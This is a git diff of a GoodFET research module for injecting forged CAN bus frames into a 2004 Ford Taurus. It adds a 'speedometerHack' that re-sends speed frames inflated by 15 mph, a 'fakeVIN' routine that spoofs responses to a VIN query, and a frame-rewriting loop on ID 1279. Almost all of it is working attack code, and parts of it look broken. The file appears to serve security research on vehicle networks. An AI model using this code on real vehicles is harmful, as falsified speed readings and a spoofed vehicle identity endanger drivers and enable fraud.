X-Git-Url: http://git.rot13.org/?a=blobdiff_plain;ds=inline;f=client%2FFordExperiments.py;h=f359bfae7395b3b48c0d8436a77b6ceae33f4b92;hb=60199925981808668a7fd5d86602a4e574bc2b63;hp=58536454b11438b10515b9aa2fe3eb4b50cdc875;hpb=3a68664f8b47dd3aff108a22d5156f8747a24ee5;p=goodfet

diff --git a/client/FordExperiments.py b/client/FordExperiments.py
index 5853645..f359bfa 100644
--- a/client/FordExperiments.py
+++ b/client/FordExperiments.py
@@ -6,16 +6,20 @@ import datetime
 import os
 from random import randrange
 from GoodFETMCPCAN import GoodFETMCPCAN;
+from experiments import experiments
 from GoodFETMCPCANCommunication import GoodFETMCPCANCommunication
 from intelhex import IntelHex;
 import Queue
 import math
 
 tT = time
-class FordExperiments(GoodFETMCPCANCommunication):
-    
-    def __init__(self):
-        GoodFETMCPCANCommunication.__init__(self)
+class FordExperiments(experiments):
+    """
+    This class is a subclass of experiments and is a car specific module for 
+    demonstrating and testing hacks. 
+    """
+    def __init__(self, dataLocation = "../../contrib/ThayerData/"):
+        GoodFETMCPCANCommunication.__init__(self, dataLocation)
         #super(FordExperiments,self).__init__(self) #initialize chip
         self.freq = 500;
 
@@ -115,7 +119,7 @@ class FordExperiments(GoodFETMCPCANCommunication):
         while( (time.time()-recieveTime) < runTime):
             #care about db3 or packet[8] that we want to count at the rate that it is
             dT = time.time()-tpast
-            packetValue += 1
+            packetValue += 10
             pV = packetValue%255
             #temp = ((packetValue+1))%2
             #if( temp == 1):
@@ -142,6 +146,25 @@ class FordExperiments(GoodFETMCPCANCommunication):
             
         #recieveTime = time.time()
         return packetParsed
+
+    def cycle4packets1279(self):
+        self.client.serInit()
+        self.spitSetup(500)
+        # filter on 1279
+        self.addFilter([1279, 1279, 1279, 1279, 1279, 1279], verbose = False)
+        packetParsed = self.getBackground(1279)
+        packet = []
+        if (packetParsed[db0] == 16):
+            # if it's the first of the four packets, replace the value in db7  with 83
+            packetParsed[db7] = 83
+            # transmit new packet
+            self.client.txpacket(packetParsed)
+        else:
+        # otherwise, leave it alone
+            # transmit same pakcet we read in
+            self.client.txpacket(packetParsed)
+        # print the packet we are transmitting
+        print packetParsed
         
         
     def oscillateTemperature(self,time):
@@ -188,11 +211,129 @@ class FordExperiments(GoodFETMCPCANCommunication):
         print packetCount;
         
         
+    def fakeVIN(self):
+       #reset eveything on the chip
+       self.client.serInit() 
+       self.reset()
+       duration = 20; #seconds 
+       
+       listenID = 2015
+       listenPacket = [2, 9, 6, 153, 153, 153, 153, 153]
+       responseID = 2024
+       #actual response by the car
+       #r1 = [34, 88, 0, 0, 0, 0, 0, 0]
+       #r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
+       #r3 = [16, 19, 73, 4, 1, 70, 65, 66]
+       
+       r1 = [34, 88, 0, 0, 0, 0, 0, 0]
+       r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
+       r3 = [16, 19, 73, 160, 159, 70, 65, 66]
+       
+       #format
+       SIDlow = (responseID & 0x07) << 5;  # get SID bits 2:0, rotate them to bits 7:5
+       SIDhigh = (responseID >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
+       packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
+                  0x08, # bit 6 must be set to 0 for data frame (1 for RTR) 
+                  # lower nibble is DLC                   
+                 r1[0],r1[1],r1[2],r1[3],r1[4],r1[5],r1[6],r1[7]]
+       packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
+              0x08, # bit 6 must be set to 0 for data frame (1 for RTR) 
+                  # lower nibble is DLC                   
+                 r2[0],r2[1],r2[2],r2[3],r2[4],r2[5],r2[6],r2[7]]
+       packet3 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
+                  0x08, # bit 6 must be set to 0 for data frame (1 for RTR) 
+                  # lower nibble is DLC                   
+                 r3[0],r3[1],r3[2],r3[3],r3[4],r3[5],r3[6],r3[7]]
+
+       self.multiPacketSpit(packet0 = r1, packet1 = r2, packet2 = r3, packet0rts = True, packet1rts = True, packet2rts = True)
+
+       #filter for the correct packet
+       self.filterForPacket(listenID, listenPacket[0],listenPacket[1], verbose = True)
+       self.client.rxpacket()
+       self.client.rxpacket() # flush buffers if there is anything
+       startTime = tT.time()
+       while( (tT.time() -startTime) < duration):
+           packet = self.client.rxpacket()
+           if( packet != None):
+               sid =  ord(packet[0])<<3 | ord(packet[1])>>5
+               if( sid == listenID):
+                   byte3 = ord(packet[6])
+                   if( byte3 == listenPacket[3]):
+                       print "SendingPackets!"
+                       #send packets
+                       self.multpackSpit(packet0rts=True,packet1rts=True,packet2rts=True)
+                       
+    def speedometerHack(self):
+        
+        self.client.serInit()
+        self.spitSetup(500)
+
+        self.addFilter([513, 513, 513])
+        
+        SIDlow = (513 & 0x07) << 5;  # get SID bits 2:0, rotate them to bits 7:5
+        SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
+                
+        while(1):
+            
+            packet = None;
+
+            # catch a packet and check its db4 value
+            while (packet == None):
+                packet=self.client.rxpacket();
+                
+            print "DB4 = %d" %packet[9]
+            mph = 1.617*packet[9] - 63.5
+            print "Current MPH = 1.617(%d)-63.5 = %d" %(packet[9], mph)
+                
+            # calculate our new mph and db4 value
+            mph = mph + 15;
+            packet[9] = ( mph + 63.5 ) / 1.617
+
+            # load new packet into TXB0 and check time
+            self.multiPacketSpit(packet0=packet, packet0rts=True)
+            starttime = time.time()
+            
+            # spit new value for 1 second
+            while (time.time()-starttime < 1):
+                self.multiPacketSpit(packet0rts=True)
+            
+
+
+            [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
+                      0x08, # bit 6 must be set to 0 for data frame (1 for RTR) 
+                      # lower nibble is DLC                   
+                      packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
+    
+    
+#        while((time.time()-starttime < duration)):
+#                    
+#                    if(faster):
+#                        packet=self.client.fastrxpacket();
+#                    else:
+
+
+       
+        
 if __name__ == "__main__":
-    fe = FordExperiments();
-    packetData = {}
-    packetData['db4'] = 4;
-    runTime = 100;
-    #fe.mimic1056(packetData, runTime)
-    #fe.cycledb1_1056(runTime)
-    fe.oscillateTemperature(runTime)
+    
+    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,description='''\
+
+    Run Hacks on a Ford taurus 2004:
+        
+            speedometerHack
+            fakeVIN
+        ''')
+    parser.add_argument('verb', choices=['speedometerHack']);
+    parser.add_argument('-v', '--variable', type=int, action='append', help='Input values to the method of choice', default=None);
+
+
+    args = parser.parse_args();
+    inputs = args.variable
+    fe = FordExperiments("../../contrib/ThayerData/");
+    
+    if( args.verb == 'speedometerHack'):
+        fe.speedometerHack()
+    elif( args.verb == 'fakeVIN'):
+        fe.fakeVIN()
+        
+